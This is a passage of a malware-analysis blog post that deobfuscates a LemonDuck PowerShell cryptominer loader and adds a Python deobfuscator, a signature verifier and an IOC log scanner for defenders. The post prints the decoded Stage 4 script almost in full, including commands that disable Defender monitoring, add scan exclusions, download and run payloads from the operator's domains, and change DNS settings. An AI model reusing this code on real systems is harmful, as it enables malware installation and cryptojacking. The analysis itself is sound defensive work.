F2Ersa.ImportP'+'arameters(F2ErsaParams)

F'+'2Ebas'+'e64 = -join([char[]]F2E'+'sign_bytes)

F2EbyteArray = [convert]::FromBase64String(F2Ebase64)

F2Esha1 = New-Object Syst'+'em.Secu'+'rity.Cryptography.SHA1CryptoServiceProvider

if(F2Ersa.verifyData(F2Eraw_bytes,F2Esha1,F2EbyteArray)) {

I'+'EX (-join[char[]]F2Eraw_bytes)

}

}

} catch{}

}

Start'+'-Sleep -Seconds 3

SIEX JGAF2Ecore_url/report.jspJGA


')-rEplAcE ([cHaR]87+[cHaR]100+[cHaR]110),[cHaR]124 -rEplAcE'E2D',[cHaR]39 -rEplAcE ([cHaR]70+[cHaR]50+[cHaR]69),[cHaR]36-crEPLAcE([cHaR]100+[cHaR]48+[cHaR]120),[cHaR]96-crEPLAcE'JGA',[cHaR]34 -rEplAcE ([cHaR]113+[cHaR]53+[cHaR]69),[cHaR]92) ) 

There is another layer of obfuscation here: malware developers stack several layers of obfuscation to evade antivirus products. In this layer the script is split into '+'-joined string fragments, and the -replace/-creplace chain at the end swaps the tokens Wdn, E2D, F2E, d0x, JGA and q5E for the characters |, ', $, `, " and \. Let's deobfuscate this layer.
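The substitution chain can be undone without running anything. The helper below is an added example written for this article, not code from the original post or from the malware; it reproduces the '+' joining and the six token replacements in the order and case-sensitivity the script applies them. The SAMPLE input is constructed for the example and is not the real payload, and stripping the backtick escapes assumes the input does not rely on backtick escapes inside strings.

```python
"""Added example (not from the original post): undo the token layer of a.jsp.

The obfuscated stage ends with a -replace/-creplace chain that swaps the literal
tokens Wdn, E2D, F2E, d0x, JGA and q5E for the characters | ' $ ` " and \\ after
PowerShell has glued the '+'-separated string fragments together. This helper
reproduces that chain so the layer can be peeled off without executing anything.
The SAMPLE input is constructed for this example and is not the real payload.
"""
import re

# (token, replacement, case_sensitive), in the order the script applies them.
# -replace is case-insensitive and -creplace is case-sensitive, so both the order
# and the sensitivity of each step are reproduced rather than merged into one table.
SUBSTITUTIONS = [
    ("Wdn", "|", False),
    ("E2D", "'", False),
    ("F2E", "$", False),
    ("d0x", "`", True),
    ("JGA", '"', True),
    ("q5E", "\\", False),
]


def deobfuscate(obfuscated: str, strip_backtick_escapes: bool = True) -> str:
    """Return the PowerShell source hidden behind the token layer."""
    # Step 1: the layer is a chain of single-quoted fragments joined with '+'.
    # PowerShell concatenates them before the replace chain runs, so the exact
    # three-character sequence '+' vanishes. A real single quote is never written
    # literally at this layer (it is always encoded as E2D), so nothing else is lost.
    text = obfuscated.replace("'+'", "")

    # Step 2: apply the substitutions in order. A callable replacement sidesteps
    # regex escape handling of the backslash and dollar in the replacement text.
    for token, replacement, case_sensitive in SUBSTITUTIONS:
        flags = 0 if case_sensitive else re.IGNORECASE
        text = re.sub(re.escape(token), lambda _m, r=replacement: r, text, flags=flags)

    # Step 3 (optional): d0x becomes PowerShell's backtick escape, which this
    # sample only uses inside bare command names (Ne`w-Obj`ect) where it is a
    # no-op. Removing it restores readable cmdlet names. Assumption: the input
    # does not rely on backtick escapes inside strings such as `n or `t.
    if strip_backtick_escapes:
        text = text.replace("`", "")
    return text


# Constructed sample in the style of the obfuscated stage above (not the real script).
SAMPLE = (
    "F2Ew'+'c = Ned0xw-Objd0xect Net.WebCd0xlientWdnforeach{F2E_}\n"
    "F2Erpath=JGAC:q5EWindo'+'wsq5ESystem32JGA\n"
    "F2Es+=F2E_.ToString(E2Dx2E2D)"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Running it on the SAMPLE prints `$wc = New-Object Net.WebClient|foreach{$_}`, `$rpath="C:\Windows\System32"` and `$s+=$_.ToString('x2')`. Feeding it the full obfuscated stage from this article yields the Stage 4 listing below; keep `strip_backtick_escapes=False` when a sample uses backtick escapes inside strings.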

Stage 4

This layer is plain PowerShell. I formatted it and added a few comments.

# Check whether the host is 64-bit
$is64=[int]([IntPtr]::Size -eq 8)

# Expected MD5 hashes of the if.bin and kr.bin payloads
#-------------------------------------block1--------------------
$ifbin="if.bin"
$ifmd5="04f9fdd312702343f074e5dd9a1ffe6f"

$krbin="kr.bin"
$krmd5="b7a1cfd74661361f71856388dac5aaa6"
#-------------------------------------block1--------------------

# On a 64-bit host, also define the names and expected MD5 hashes of the m6.bin and m6g.bin payloads
if($is64){

    $mbin="m6.bin"
    $mmd5="32390a001e1207eafdd66e35c55aa9d3"
    $mgbin="m6g.bin"
    $mgmd5="26c0d79a29223e96ae52cb2775c96813"

}

# Returns the MD5 hex digest of its input bytes
function gmd5($d){
    [Security.Cryptography.MD5]::Create().ComputeHash($d)| foreach{ $l+=$_.ToString('x2')}
    return $l

}

# Looks for an existing copy of powershell.exe under another name in the PowerShell directory (same MD5); otherwise copies powershell.exe to a random name and returns that name
function getrname(){
    
    $rpath="C:\Windows\System32\Windowspowershell\V1.0"
    $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}

    $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))

    foreach($ename in $enames){
        
        $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
        
        if($tmd5 -eq $md5_){
            return $ename
        }
    }

    $ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"

    copy-item "$rpath\powershell.exe" "$rpath\$ename"|out-null

    if(!(test-path "$rpath\$ename")){
        $ename="powershell.exe"
        }
    return $ename
}

# Name of the (renamed) powershell.exe copy used by the later stages
$rename=getrname

# initializing some values
$lifmd5,$lmmd5,$lkrmd5="","",""


# This block checks whether the binaries $ifbin, $mbin and $krbin already exist in %tmp% and, if they do, calculates their MD5 sums
#---------------------------block2----------------------
try{
    $lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))
}
catch{}

try{
    $lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))
}
catch{}

try{
    $lkrmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$krbin"))
}
catch{}
#---------------------------block2----------------------


# This block defines the URL variables.
#-------------------URLs--------------------
$down_url = "http://d.u78wjdu.com"

if(!$url){
    $url="http://t.bb3u9.com"
}

$core_url = $url.split("/")[0..2]-join"/"
#-------------------URLs--------------------


# Checks whether the current user has administrator privileges
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

# This block collects information about the host: name, MAC address, OS version, username, domain, graphics card, RAM, etc.
#---------------------------------------block 3----------------------------------------
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$cpuname = (get-wmiobject win32_processor).name
$card = (Get-WmiObject Win32_VideoController).name
$cpu_per = "$((Get-WmiObject -Class Win32_Processor).LoadPercentage)"

gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb
try{
    $drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"
}
catch{}
#---------------------------------------block 3----------------------------------------

# Queries http://127.0.0.1:43669/1/summary (a miner's local HTTP API) and, if it answers, records the miner version, connection IP and total hashrate
try{
    [Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
    
    $obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))

    $mv=$obj.version
    $mip=$obj.connection.ip
    $mhr=$obj.hashrate.total-join(',')
}
catch{}


# Tries to disable Defender real-time monitoring, excludes the whole C: drive from scanning, and excludes both powershell.exe and its renamed copy as processes (this only works when run as admin, hence the try block)
try{
    
    Set-MpPreference -DisableRealtimeMonitoring 1
    Add-MpPreference -ExclusionPath c:\
    Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\$rename

}
catch{}


# Identifies the vendor of Graphic card
if(($card -match "GTX|NVIDIA|GEFORCE")){
    $isn=1
}
if(($card -match "Radeon|AMD")){
    $isa=1
}

# Builds the beacon query string from the URL's query part, the computer name, the machine UUID and the MAC address
$v=$url.split("?")[1]
$params=@($v,$comp_name,$guid,$mac)-join"&"

# Goes to temp Directory
set-location $env:tmp

# Runs a command line through cmd.exe /c
function stp($gra){
    write-host $gra
    Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}

# Builds the command text that downloads $fn from $down_url into %tmp%, unless a local copy whose MD5 matches $md already exists
function gcf($code,$md,$fn){
    ('echo '+$code+';
    $ifmd5='''+$md+''';
    $ifp=$env:tmp+''\'+$fn+''';
    $down_url='''+$down_url+''';
    
    function gmd5($con){
        [System.Security.Cryptography.MD5]::Create().ComputeHash($con) | foreach{$s+=$_.ToString(''x2'')};
        return $s
    }
    if(test-path $ifp){
        $con_=[System.IO.File]::ReadAllBytes($ifp);
        $md5_=gmd5 $con_;
        if($md5_-eq$ifmd5){
            $noup=1
        }
    }
    if(!$noup){
        $con=(New-Object Net.WebClient).downloaddata($down_url+''/'+$fn+'?'+$params+''');
        $t=gmd5 $con;
        if($t-eq$ifmd5){
            [System.IO.File]::WriteAllBytes($ifp,$con)
        }
        else{
            $noup=1
        }
    }
    if($noup){
        $con=$con_;
        $ifmd5=$md5_
    }').replace('|','^^^|').replace('&','^^^&')
}

# Builds the loader text for the .bin payloads: runs the first line of $con, gunzips the remainder into a PE, writes it to %tmp% with 100 random trailing bytes and launches it
function gpa($fnam,$name){
    ('for($i=0;$i -lt $con.count-1;$i+=1){
        if($con[$i] -eq 0x0a){
            break
        }
    };
    iex(-join[char[]]$con[0..$i]);
    $bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
    
    $bin_=$bin.Clone();
    $mep=$env:tmp+'''+"\$fnam.ori"+''';
    [System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
    test1 -PEBytes $bin'
    ).replace('|','^^^|').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
}

# Builds the text that pipes $con straight into the renamed powershell.exe
function gpb($name){
    'IEX(-join[char[]]$con)|'+$name+' -'
}

# Builds a mutex guard: $local<name> is true only if the mutex Global\eLocal<name> did not already exist, so each component runs once
function gcode($fl) {
    'try{
        $local'+$fl+'=$flase;
        New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')
    }
    catch{}'
}

$code1=gcode "If"
IEx $code1

if($localIf){
    stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
}

if($is64){
    $code2=gcode "TMn"

    IEx $code2
    if($localTMn){
        stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
    }
}

if(($isn -or $isa) -and $is64){
    
    $code3=gcode "TMng"
    IEx $code3
    
    if($localTMng){
        stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
    }
}

$code4=gcode "Kr"
IEx $code4

if($localKr){
    stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
}

# Opens a TCP listener on port 65529 through the renamed powershell.exe (an infection marker)
stp ('echo try{
    $s=[System.Net.Sockets.TcpListener]65529;
    $s.start();
    while(1){}
    }
    catch{}|'+$rename+' -')


# Whether configXXX1.json exists beside powershell.exe; reported back as a flag
$conf_f=test-path c:\windows\system32\WindowsPowerShell\v1.0\configXXX1.json

# Resolves p.b69kq.com, then records the process using the most CPU and the remote endpoint of its ESTABLISHED connection
$lmip=[System.Net.Dns]::GetHostAddresses("p.b69kq.com") | foreach {echo $_.IPAddressToString }

$tpid,$tpname=(get-process|sort cpu -Descending|select-object -first 1|foreach{$_.id,$_.processname})

$tcpconn = NetStat -anop TCP

$ipport=""

foreach($t in $tcpconn){

    $line = $t.split(' ')| ? {$_}
    if ($line -eq $null) {
        continue 
    }

    if($t.contains("ESTABLISHED") -and ($line[-1] -eq $tpid)){
        $ipport = $line[2]
        break
    }
}

# Replaces the DNS servers of every IP-enabled adapter with 8.8.8.8 and 9.9.9.9, bypassing the local DNS configuration
try{
    (get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))
}
catch{}

# Appends the collected host fingerprint to the beacon parameters
$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$cpuname,$card,$mem,$cpu_per,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),($lkrmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,[Int]$conf_f,$lmip,$tpname,$ipport,"0.9")-join"&")

# Fetches $url?$params, checks the RSA/SHA-1 signature carried in the first 172 bytes of the response and runs the rest only if it verifies
function SIEX {
    Param([string]$url)
    
    try{
        $webclient = New-Object Net.WebClient
        $finalurl = "$url"+"?"+"$params"
    try{
        $webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
    }
    catch{}
    $res_bytes = $webclient.DownloadData($finalurl)
    if($res_bytes.count -gt 173){
        $sign_bytes = $res_bytes[0..171];
        $raw_bytes = $res_bytes[173..$res_bytes.count];
        $rsaParams = New-Object System.Security.Cryptography.RSAParameters
        
        $rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
        
        $rsaParams.Exponent = 0x01,0x00,0x01

        $rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
        $rsa.ImportParameters($rsaParams)
        
        $base64 = -join([char[]]$sign_bytes)
        $byteArray = [convert]::FromBase64String($base64)
        
        $sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
        
        if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
            IEX (-join[char[]]$raw_bytes)
            }
        }
    } 
    catch{}
}

Start-Sleep -Seconds 3
SIEX "$core_url/report.jsp"
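The SIEX function is what ties the bot to its operator: the response body is 172 bytes of base64 (an RSA-1024 signature), a separator byte, and then the payload, which only runs if the signature verifies under the public key embedded in the script. The parser and verifier below are an added example written for this article, not code from the post or from the malware; they reimplement the .NET VerifyData check (RSASSA-PKCS1-v1_5 with SHA-1) in the Python standard library so an analyst can test captured responses offline. The modulus is copied from the decoded script; the fake_body and every other value are constructed. Because nobody without the operator's private key can produce a valid signature, a sinkhole of these domains can never make the bot execute anything, and that is also why an unexpected response is silently dropped rather than logged.

```python
"""Added example (not from the original post): parse and verify a SIEX response.

SIEX above treats the HTTP body as 172 bytes of base64 text (an RSA-1024
signature), one separator byte at offset 172, then the PowerShell payload from
offset 173, and runs the payload only if RSACryptoServiceProvider.VerifyData
with SHA-1 accepts it. That .NET call is RSASSA-PKCS1-v1_5; it is reimplemented
here with the standard library so a captured response can be checked offline
against the public key embedded in the script. The modulus is copied from the
decoded script; every other value is constructed for the example.
"""
from __future__ import annotations

import base64
import hashlib

# 128-byte modulus and exponent 0x010001 from the decoded script's $rsaParams.
LEMONDUCK_MODULUS = bytes.fromhex(
    "da65a8d7bb97bc6d415e" "999d82ff2fff73539a73" "6e6c7b55eb67d6ae4e23"
    "3c523dc0cdcd376bf34f" "3b62708607966ecadebd" "a64ff611d160dc88bf35"
    "f292ee6cb82e9b7d2bd1" "193073c65201cde7c734" "788aa79fe212cd7940a7"
    "916aae958e42d0cf396e" "30cb0a98db973ff62e95" "1072fd63d5f78863a47b"
    "ae97ea38b7476b5d"
)
LEMONDUCK_EXPONENT = 65537

SIG_B64_LEN = 172       # $res_bytes[0..171]
PAYLOAD_OFFSET = 173    # $res_bytes[173..]; byte 172 is a separator

# DER-encoded DigestInfo prefix for SHA-1 (RFC 8017, section 9.2, note 1).
SHA1_DIGEST_INFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def split_response(body: bytes) -> tuple[bytes, bytes]:
    """Split a raw body into (signature, payload) exactly as SIEX slices it."""
    if len(body) <= PAYLOAD_OFFSET:
        # SIEX only acts when count -gt 173; shorter bodies are ignored.
        raise ValueError("response too short to carry a signature and payload")
    signature = base64.b64decode(body[:SIG_B64_LEN])
    return signature, body[PAYLOAD_OFFSET:]


def expected_encoded_message(payload: bytes, modulus_len: int) -> bytes:
    """EM = 0x00 || 0x01 || PS (0xff bytes) || 0x00 || DigestInfo(SHA-1(payload))."""
    digest_info = SHA1_DIGEST_INFO_PREFIX + hashlib.sha1(payload).digest()
    padding_len = modulus_len - len(digest_info) - 3
    if padding_len < 8:
        raise ValueError("modulus too small for PKCS#1 v1.5 encoding")
    return b"\x00\x01" + b"\xff" * padding_len + b"\x00" + digest_info


def verify_pkcs1v15_sha1(payload: bytes, signature: bytes,
                         modulus: bytes = LEMONDUCK_MODULUS,
                         exponent: int = LEMONDUCK_EXPONENT) -> bool:
    """True if signature is a valid RSASSA-PKCS1-v1_5/SHA-1 signature over payload."""
    k = len(modulus)
    if len(signature) != k:
        return False
    n = int.from_bytes(modulus, "big")
    s = int.from_bytes(signature, "big")
    if s >= n:
        return False
    # Public RSA operation, then compare the whole encoded message rather than
    # only the trailing hash so lenient-padding forgeries are not accepted.
    m = pow(s, exponent, n).to_bytes(k, "big")
    return m == expected_encoded_message(payload, k)


def response_is_authentic(body: bytes) -> bool:
    """True only when the body carries a signature valid under the embedded key."""
    try:
        signature, payload = split_response(body)
    except ValueError:          # too short, or not decodable as base64
        return False
    return verify_pkcs1v15_sha1(payload, signature)


if __name__ == "__main__":
    # Constructed body: an all-zero signature that cannot verify under any key.
    fake_body = b"A" * 171 + b"=" + b"\n" + b"Write-Host test"
    print("authentic:", response_is_authentic(fake_body))
```

To check a real capture, pass the raw bytes of the HTTP body to `response_is_authentic`; a `True` result confirms the body was produced by the holder of the key in the sample, which is useful for attributing a captured response to this campaign.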

IOC

IOCs (Indicators of Compromise) are pieces of data, such as entries in logs or files, that identify potentially malicious activity on a system or network. They help identify the systems that might be affected by the malware: for example, if the malware communicates with an external IP address, any system that contacted that IP address is considered to be infected.

So in this malware the potential IOCs are:

  • Any HTTP requests made to “hxxps[://]t[.]zz3ro[.]com”, “hxxps[://]t[.]zker9[.]com” or “hxxps[://]t[.]bb3u9[.]com” (URLs are defanged to prevent accidental clicks)
  • Presence of a scheduled task named blackball, or with similarly random names.
  • Presence of open listening ports such as port 65529
  • Presence of an event with the name blackball
  • Antivirus products that were uninstalled without user action
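The network indicators above can be turned into a simple log check. The script below is an added example for this article, not part of the original post: it refangs the defanged hostnames from the list, adds the hostnames that appear in the decoded Stage 4 script (t.bb3u9.com, d.u78wjdu.com, p.b69kq.com), and flags proxy log lines by host, by the `Lemon-Duck-` User-Agent prefix that SIEX sets, or by a request to `report.jsp` or a `.bin` payload carrying the &-joined beacon query. The log lines and their field layout (timestamp, client, method, URL, status, quoted User-Agent) are constructed for the example; `parse_line` is the part to adapt to a real log source.

```python
"""Added example (not from the original post): match the IOCs above against web
proxy log lines.

The defanged hostnames from the IOC list are refanged, the hostnames that appear
in the decoded Stage 4 script are added, and each log line is checked for a
matching host, the Lemon-Duck- User-Agent prefix that SIEX sets, or a request to
report.jsp / a .bin payload carrying the &-joined beacon query. The log lines and
their field layout (timestamp client method url status "user-agent") are
constructed for this example; adapt parse_line to the real log source.
"""
from __future__ import annotations

import re
from typing import Iterable
from urllib.parse import urlsplit

DEFANGED_IOCS = [
    "hxxps[://]t[.]zz3ro[.]com",
    "hxxps[://]t[.]zker9[.]com",
    "hxxps[://]t[.]bb3u9[.]com",
]
# Hostnames the decoded script uses for beaconing, payload download and lookup.
SCRIPT_HOSTS = {"t.bb3u9.com", "d.u78wjdu.com", "p.b69kq.com"}


def refang(ioc: str) -> str:
    """Turn a defanged URL or hostname into a bare lower-case hostname."""
    text = ioc.replace("[://]", "://").replace("[.]", ".")
    text = re.sub(r"^hxxps?://", "", text, flags=re.IGNORECASE)
    return text.split("/", 1)[0].lower()


IOC_HOSTS = {refang(ioc) for ioc in DEFANGED_IOCS} | SCRIPT_HOSTS

USER_AGENT_PREFIX = "Lemon-Duck-"
# The script requests <core_url>/report.jsp and <down_url>/<name>.bin, each with
# a query string of &-joined fields ($v, computer name, UUID, MAC, ...).
BEACON_PATH = re.compile(r"^/(report\.jsp|[a-z0-9]+\.bin)$", re.IGNORECASE)
MIN_BEACON_FIELDS = 4

# Constructed line layout: timestamp client method url status "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse_line(line: str) -> dict:
    """Parse one constructed-format line into its fields (raises on bad input)."""
    m = LOG_LINE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, client, method, url, status, ua = m.groups()
    parts = urlsplit(url)
    return {"ts": ts, "client": client, "method": method,
            "host": (parts.hostname or "").lower(), "path": parts.path,
            "query": parts.query, "status": int(status), "ua": ua}


def match_line(line: str) -> list[str]:
    """Return the reasons a line matches the LemonDuck IOCs (empty list = clean)."""
    rec = parse_line(line)
    reasons = []
    if rec["host"] in IOC_HOSTS:
        reasons.append(f"host {rec['host']} is a known LemonDuck C2/download domain")
    if rec["ua"].startswith(USER_AGENT_PREFIX):
        reasons.append("User-Agent carries the Lemon-Duck- prefix set by SIEX")
    if BEACON_PATH.match(rec["path"]) and len(rec["query"].split("&")) >= MIN_BEACON_FIELDS:
        reasons.append(f"{rec['path']} requested with a beacon-style query string")
    return reasons


def scan(lines: Iterable[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, reasons) for every line that matches at least one IOC."""
    hits = []
    for index, line in enumerate(lines):
        reasons = match_line(line)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed log lines; the first two imitate the beacon and a payload fetch.
SAMPLE_LOG = [
    '2021-03-01T10:00:01Z 10.0.0.5 GET http://t.bb3u9.com/report.jsp?1&HOST1&uuid&mac 200 "Lemon-Duck-C-Users-victim"',
    '2021-03-01T10:00:02Z 10.0.0.5 GET http://d.u78wjdu.com/if.bin?1&HOST1&uuid&mac 200 "Mozilla/5.0"',
    '2021-03-01T10:00:03Z 10.0.0.7 GET https://www.example.com/index.html 200 "Mozilla/5.0"',
    '2021-03-01T10:00:04Z 10.0.0.9 GET http://cdn.example.com/report.jsp?x 404 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG):
        print(f"line {index}: " + "; ".join(reasons))
```

The host match is the strongest signal; the User-Agent and path rules catch beacons to domains not yet on the list, which matters for a family that rotates domains between versions, at the cost of occasional false positives on unrelated `report.jsp` endpoints, so they are reported as reasons rather than merged into a single verdict.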

You can get the scripts that I extracted and the IOCs we determined from this github repository


Thanks for Reading, Stay tuned for more ❤︎

If you enjoyed reading the article do follow me on:

Twitter

LinkedIn

Website

GitHub

This post is licensed under CC BY 4.0 by the author.